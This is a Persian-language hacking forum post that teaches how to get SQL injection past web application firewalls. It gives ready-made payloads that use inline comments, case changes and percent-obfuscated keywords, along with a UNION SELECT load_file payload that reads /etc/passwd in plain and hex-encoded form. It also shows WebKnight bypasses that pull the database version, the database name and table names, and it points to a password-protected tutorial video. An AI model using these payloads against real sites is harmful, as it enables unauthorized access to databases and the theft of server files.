با سلام و عرض خسته نباشید:

در بسیاری از حملان تزریق به دیتابیس فایروال های تحت وب با عث عدم تزریق دستورات میشند که معمولا چنین ارور هایی رو برای ما به نمایش در میارن:



Forbidden

You don't have permission to access /[].php on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


Not Acceptable

An appropriate representation of the requested resource /[].php could not be found on this server.




correspond
You don't have permission to access /[].php on this server.


که برای بایپس کردن این گونه ارور ها می تونید از روش های مختلفی نظیر inline comment یا case changing و... استفاده کنید , البته در بعضی موارد اگر خود فایروال به آسیب پذیری corresponding الوده باشه می تونید دستورات رو با دست باز تری مثله :


1:id=1/*union*/union/*select*/select+1,2,3/*
2:id=1/*uniX on*/union/*selX ect*/select+1,2,3/*
3:id=1+un/**/ion+sel/**/ect+1,2,3--
4:id=1/**/union/*&id=*/select/
5:id=1/**/union/*,*/select/*,*/
.
.
.


وارد کنید ( که البته در آینده از این نوع رو هم فیلم می کنم)
و بالاخره موضوع فیلم:
1: Case changing
2:Inline Comments
================================================== ===
اولین فیلمی هست که میسازم به بزرگیتون ببخشید و لطفا فقط فیلم رو با ابزار camplay که داخل فایل هست ببینید تا کیفیت خوبی داشته باشه.
پسورد: ashiyane.org
فایل رو نتونستم پیوست کنم از [Only registered and activated users can see links] استفاده کنید.
================================================== ===

[Only registered and activated users can see links]

کامل و قابل فهم : برمیگرده به تاریخ:2011-10-06

Title : Beyond SQLi: Obfuscate and Bypass
Author : "ZeQ3uL" (Prathan Phongthiproek) and "Suphot Boonchamnan"
Team : CWH Underground [[Only registered and activated users can see links]]
Date : 2011-10-06



##########
Contents
##########

[0x00] - Introduction

[0x01] - ****** Evasion (Mysql)

[0x01a] - Bypass Functions and Keywords Filtering
[0x01b] - Bypass Regular Expression Filtering

[0x02] - Normally Bypassing Techniques

[0x03] - Advanced Bypassing Techniques

[0x03a] - HTTP Parameter Pollution: Split and Join
[0x03b] - HTTP Parameter Contamination

[0x04] - How to protect your website

bypassing 501 Not Implemented :



501 Not Implemented
The requested method is not implemented by the server.
__________________________________________________ ___________________________________________
Powered By LiteSpeed Web Server
LiteSpeed Technologies is not responsible for administration and contents of this web site!




[Only registered and activated users can see links] /*!union select 1,2,load_file("/etc/passwd"),4,5,6*/--+--/**

/etc/passwd ===> H3x Enc0Ding ===>0x2f6574632f706173737764

[Only registered and activated users can see links] /*!union select 1,2,load_file(0x2f6574632f706173737764),4,5,6*/--+--/**

جایی دیدم گفتم بزارم:
هرچند در پست دوم در بارش اومده.

Bypass AQTRONIX WebKnight

Description:
AQTRONIX WebKnight is an application firewall for IIS and other web servers and is released under the GNU General Public License. More particularly it is an ISAPI ****** that secures your web server by blocking certain requests.

BYPASS :

[Only registered and activated users can see links](2)=(s%elect convert(int,@@version))

[Only registered and activated users can see links](2)=(s%elect convert(int,DB_N%AME()))

Forbidden: [Only registered and activated users can see links] and 1=0/(select top 1 table_name from information_schema.tables)
Bypassed : [Only registered and activated users can see links] a%nd 1=0/(se%lect top 1 ta%ble_name fr%om iformation_schema.tables)